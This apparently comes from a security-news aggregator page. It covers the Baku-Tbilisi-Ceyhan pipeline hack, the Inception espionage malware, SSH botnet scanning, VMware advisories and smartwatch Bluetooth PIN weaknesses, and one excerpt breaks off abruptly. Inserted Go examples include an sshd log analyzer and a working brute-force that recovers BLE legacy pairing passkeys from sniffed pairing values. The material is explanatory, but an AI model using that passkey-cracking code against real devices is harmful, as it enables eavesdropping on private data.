Information Security News
Bloomberg News is reporting evidence of a watershed event in the annals of cyberwarfare, a 2008 hack attack that caused a Turkish oil pipeline to spectacularly burst into flames.
If true, the hack could rewrite the history of cyberwar. The first known use of a digital weapon to cause physical damage on an enemy is the Stuxnet worm, which in 2009 caused the destruction of uranium centrifuges in Iran's Natanz nuclear facility. (The malware was unleashed on a handful of carefully selected targets a year or so earlier, journalist and author Kim Zetter reported in a recent book, but it took time for it to reach its intended target.) The timing has earned Stuxnet the title of the world's first known digital weapon. The Bloomberg account suggests the hack on the Turkish pipeline occurred around the same time Stuxnet was released and effected physical damage a year earlier than Stuxnet did. Update: As several readers have pointed out in the comments below, the suspected sabotage of a Siberian pipeline in 1982 is believed to have used a logic bomb.
As described by Bloomberg, attackers gained access to the pipeline's computerized operational controls and increased the pressure of the crude oil flowing inside. By hacking the video and sensors that closely monitored the 1,099-mile Baku-Tbilisi-Ceyhan pipeline, the attackers prevented operators from learning of the blast until 40 minutes after it happened, when a security worker who saw the flames reported it, Bloomberg said. As many as 60 hours of surveillance video were also erased. According to Bloomberg:
Researchers have uncovered yet another international espionage campaign that is so sophisticated and comprehensive that it could only have been developed with the backing of a well-resourced country.
Inception, as the malware is dubbed in a report published Tuesday by Blue Coat Labs, targets devices running Windows, Android, BlackBerry, and iOS, and uses free accounts on Swedish cloud service Cloudme to collect pilfered data. Malware infecting Android handsets records incoming and outgoing phone calls to MP4 sound files that are periodically uploaded to the attackers. The researchers also uncovered evidence of an MMS phishing campaign designed to work on at least 60 mobile networks in multiple countries in an attempt to infect targeted individuals.
"There clearly is a well-resourced and very professional organization behind Inception, with precise targets and intentions that could be widespread and harmful," the Blue Coat report stated. "The complex attack framework shows signs of automation and seasoned programming, and the number of layers used to protect the payload of the attack and to obfuscate the identity of the attackers is extremely advanced, if not paranoid."
I noticed it in my own logs overnight and also had a couple of readers (both named Peter) report some odd new ssh scanning overnight. The scanning involves many sites, likely a botnet, attempting to ssh in as 3 users, D-Link, admin, and ftpuser. Given the first of those usernames, I suspect that they are targeting improperly configured D-Link routers or other appliances that have some sort of default password. The system that I have at home was not running kippo, so I didn't get the passwords that they were guessing and was not able to see what they might do if they succeed in ssh-ing in. If anyone out there has any more info on what exactly they are targeting, please let us know by e-mail, via the contact page, or by commenting on this post. I'll try to reconfigure a couple of kippo honeypots to see if I can capture the bad guys there and may update this post later.
Jim Clausing, GIAC GSE #26
jclausing --at-- isc [dot] sans (dot) edu
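A quick check a reader could run over their own sshd logs, added here as an example and not part of Jim's diary or the ISC's tooling: it counts how many distinct source addresses tried each of the three usernames the diary names, which is the number that separates one noisy host from the botnet the diary suspects. It assumes OpenSSH's standard auth.log line format ("Invalid user X from IP" and "Failed password for [invalid user] X from IP"); the log excerpt is constructed, with RFC 5737 documentation addresses standing in for scanner IPs.

```go
package main

import (
	"fmt"
	"regexp"
	"sort"
	"strings"
)

// SampleAuthLog is a constructed excerpt in OpenSSH auth.log format; it is not
// a real capture. RFC 5737 documentation addresses stand in for scanner IPs.
const SampleAuthLog = `Dec 10 03:14:07 gw sshd[4123]: Invalid user D-Link from 203.0.113.5
Dec 10 03:14:07 gw sshd[4123]: Failed password for invalid user D-Link from 203.0.113.5 port 51234 ssh2
Dec 10 03:14:09 gw sshd[4125]: Invalid user admin from 203.0.113.5
Dec 10 03:14:12 gw sshd[4127]: Invalid user ftpuser from 198.51.100.7
Dec 10 03:15:01 gw sshd[4130]: Invalid user D-Link from 198.51.100.7
Dec 10 03:15:44 gw sshd[4133]: Invalid user admin from 192.0.2.33
Dec 10 03:16:02 gw sshd[4135]: Failed password for root from 192.0.2.33 port 40022 ssh2
Dec 10 03:17:30 gw sshd[4140]: Invalid user D-Link from 192.0.2.77
Dec 10 03:18:00 gw sshd[4142]: Accepted publickey for jim from 10.0.0.2 port 50000 ssh2`

// WatchedUsers are the three account names the diary reports being tried.
var WatchedUsers = []string{"D-Link", "admin", "ftpuser"}

// attemptRe matches the sshd lines a failed login for a given user produces.
var attemptRe = regexp.MustCompile(`sshd\[\d+\]: (?:Invalid user|Failed password for(?: invalid user)?) (\S+) from (\d{1,3}(?:\.\d{1,3}){3})`)

// SourcesByUser returns, for each watched username, the distinct source IPs
// that attempted it.
func SourcesByUser(log string) map[string]map[string]bool {
	watched := make(map[string]bool, len(WatchedUsers))
	for _, u := range WatchedUsers {
		watched[u] = true
	}
	out := make(map[string]map[string]bool)
	for _, line := range strings.Split(log, "\n") {
		m := attemptRe.FindStringSubmatch(line)
		if m == nil || !watched[m[1]] {
			continue // not a failed login, or a username we are not tracking
		}
		user, ip := m[1], m[2]
		if out[user] == nil {
			out[user] = make(map[string]bool)
		}
		out[user][ip] = true
	}
	return out
}

// DistinctSources is the number of different IPs that tried one username.
func DistinctSources(log, user string) int {
	return len(SourcesByUser(log)[user])
}

// SuspectIPs lists every source that tried any watched username, sorted, so
// it can feed a blocklist or be steered at a kippo honeypot for a closer look.
func SuspectIPs(log string) []string {
	seen := make(map[string]bool)
	for _, ips := range SourcesByUser(log) {
		for ip := range ips {
			seen[ip] = true
		}
	}
	ips := make([]string, 0, len(seen))
	for ip := range seen {
		ips = append(ips, ip)
	}
	sort.Strings(ips)
	return ips
}

// LooksDistributed reports whether one username was tried from at least
// minSources different IPs, the pattern a botnet scan leaves behind.
func LooksDistributed(log string, minSources int) bool {
	for _, u := range WatchedUsers {
		if DistinctSources(log, u) >= minSources {
			return true
		}
	}
	return false
}

func main() {
	for _, u := range WatchedUsers {
		fmt.Printf("%-8s tried from %d distinct sources\n", u, DistinctSources(SampleAuthLog, u))
	}
	fmt.Println("suspect IPs:", SuspectIPs(SampleAuthLog))
	fmt.Println("distributed scan:", LooksDistributed(SampleAuthLog, 3))
}
```

The threshold for LooksDistributed is a judgement call: a single misconfigured client retrying "admin" from one address is noise, while the same three usernames arriving from many unrelated networks within minutes is the signature the diary describes.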
We got two security updates from VMware this week:

| Advisory | CVE | Product | Summary |
| VMSA-2014-0013 | CVE-2014-8373 | VMware vCloud Automation Center | Remote privilege escalation vulnerability. Authenticated remote users may obtain administrative privileges. Mitigated by turning off "Connect (by) Using VMRC". |
| VMSA-2014-0014 | CVE-2014-8372 | AirWatch | A direct object reference vulnerability allows users to see each other's information. |
The growing number of smart devices that interoperate with smartphones could leave text messages, calendar entries, biometric data, and other sensitive user information wide open to hackers, security researchers warn.
That's because most smart watches rely on a six-digit PIN to secure information traveling to and from connected Android smartphones. With only one million possible keys securing the Bluetooth connection between the handset and the smart device, the PINs are susceptible to brute-force attacks, in which a nearby hacker attempts every possible combination until finding the right one.
Researchers from security firm Bitdefender mounted a proof-of-concept hack against a Samsung Gear Live smartwatch that was paired with a Google Nexus 4 running Android L Preview. Using readily available hacking tools, they found that the PIN obfuscating the Bluetooth connection between the two devices was easily brute forced. From that point on, they were able to monitor the information passing between the watch and the phone.
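To show why a million-key space is no obstacle, here is an added example in Go; it is not code from the article or from Bitdefender's research. The article does not say which pairing mode the watch used, so the example assumes Bluetooth LE legacy pairing, where the six-digit passkey is the Temporary Key (TK) and the confirm value c1 sent during pairing is computed from TK plus values that are visible on the air. Once one pairing exchange has been sniffed, every candidate passkey can be checked offline with two AES operations. The Pairing Request/Response PDUs, addresses, and random nonce below are constructed, and the program plays both sides: it builds the "captured" confirm value from a secret passkey and then recovers that passkey from the public values alone.

```go
package main

import (
	"crypto/aes"
	"encoding/binary"
	"fmt"
)

// PairingParams holds the values visible on the air during a BLE legacy
// pairing exchange (Pairing Request/Response PDUs and both addresses).
type PairingParams struct {
	Preq, Pres [7]byte // Pairing Request / Pairing Response PDUs (opcode + 6 parameter bytes)
	Iat, Rat   byte    // initiating / responding address type (0 = public, 1 = random)
	Ia, Ra     [6]byte // initiating / responding device address
}

// e is the AES-128 block encryption the Security Manager builds on
// (Bluetooth Core Spec Vol 3, Part H, 2.2.1).
func e(key, plaintext [16]byte) [16]byte {
	block, err := aes.NewCipher(key[:])
	if err != nil {
		panic(err) // unreachable: key is always 16 bytes
	}
	var out [16]byte
	block.Encrypt(out[:], plaintext[:])
	return out
}

func xor16(a, b [16]byte) [16]byte {
	var out [16]byte
	for i := range a {
		out[i] = a[i] ^ b[i]
	}
	return out
}

// c1 is the confirm value function (Core Spec Vol 3, Part H, 2.2.3):
//   c1(k, r, preq, pres, iat, ia, rat, ra) = e(k, e(k, r XOR p1) XOR p2)
//   p1 = pres || preq || rat' || iat'      p2 = padding || ia || ra
// Fields are laid out in the spec's MSB-first presentation; values taken from
// an over-the-air capture are sent LSB-first and must be byte-reversed first.
func c1(k, r [16]byte, p PairingParams) [16]byte {
	var p1, p2 [16]byte
	copy(p1[0:7], p.Pres[:])
	copy(p1[7:14], p.Preq[:])
	p1[14] = p.Rat
	p1[15] = p.Iat
	copy(p2[4:10], p.Ia[:])
	copy(p2[10:16], p.Ra[:])
	return e(k, xor16(e(k, xor16(r, p1)), p2))
}

// TKFromPasskey builds the 128-bit Temporary Key: the six-digit passkey
// (0..999999) zero-extended to 128 bits.
func TKFromPasskey(passkey uint32) [16]byte {
	var tk [16]byte
	binary.BigEndian.PutUint32(tk[12:], passkey)
	return tk
}

// BruteForcePasskey recovers the passkey from one captured (confirm, rand)
// pair. Each candidate is checked offline against c1, so the whole
// one-million-key space costs two AES block operations per guess.
// Returns -1 if no passkey reproduces the confirm value.
func BruteForcePasskey(confirm, rand [16]byte, p PairingParams) int {
	for pk := uint32(0); pk < 1000000; pk++ {
		if c1(TKFromPasskey(pk), rand, p) == confirm {
			return int(pk)
		}
	}
	return -1
}

// Demo builds a constructed pairing capture from a secret passkey (standing in
// for a sniffed exchange) and then recovers the passkey from the public values.
func Demo(secret uint32) int {
	params := PairingParams{ // constructed values, not a real capture
		Preq: [7]byte{0x01, 0x04, 0x00, 0x01, 0x10, 0x07, 0x07},
		Pres: [7]byte{0x02, 0x03, 0x00, 0x01, 0x10, 0x07, 0x07},
		Iat:  0,
		Rat:  0,
		Ia:   [6]byte{0x02, 0x00, 0x5e, 0x10, 0x00, 0x01},
		Ra:   [6]byte{0x02, 0x00, 0x5e, 0x10, 0x00, 0x02},
	}
	var mrand [16]byte
	copy(mrand[:], "constructed-rand") // exactly 16 bytes; a real Mrand is random
	mconfirm := c1(TKFromPasskey(secret), mrand, params) // what a sniffer would see
	return BruteForcePasskey(mconfirm, mrand, params)
}

func main() {
	fmt.Printf("recovered passkey: %06d\n", Demo(123456))
}
```

The search finishes in well under a second on a laptop, which is the whole point: a six-digit passkey gives at most 20 bits of entropy and nothing in legacy pairing stretches it. The fix is not a longer PIN but LE Secure Connections (Bluetooth 4.2), whose ECDH key agreement keeps a passive sniffer from learning anything useful from the passkey exchange.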
Posted by InfoSec News on Dec 10: http://www.csoonline.com/article/2857455/business-continuity/fbi-says-theres-nothing-linking-north-korea-to-sony-hack.html
Posted by InfoSec News on Dec 10: http://www.defenseone.com/technology/2014/12/can-iran-turn-your-lights/100821/
Posted by InfoSec News on Dec 10: http://www.computerweekly.com/news/2240236318/Cloud-security-remains-a-barrier-for-CIOs-across-Europe
Posted by InfoSec News on Dec 10: http://gcn.com/blogs/cybereye/2014/12/va-cybersecurity-documentation.aspx
Posted by InfoSec News on Dec 10: http://seclists.org/fulldisclosure/2014/Dec/37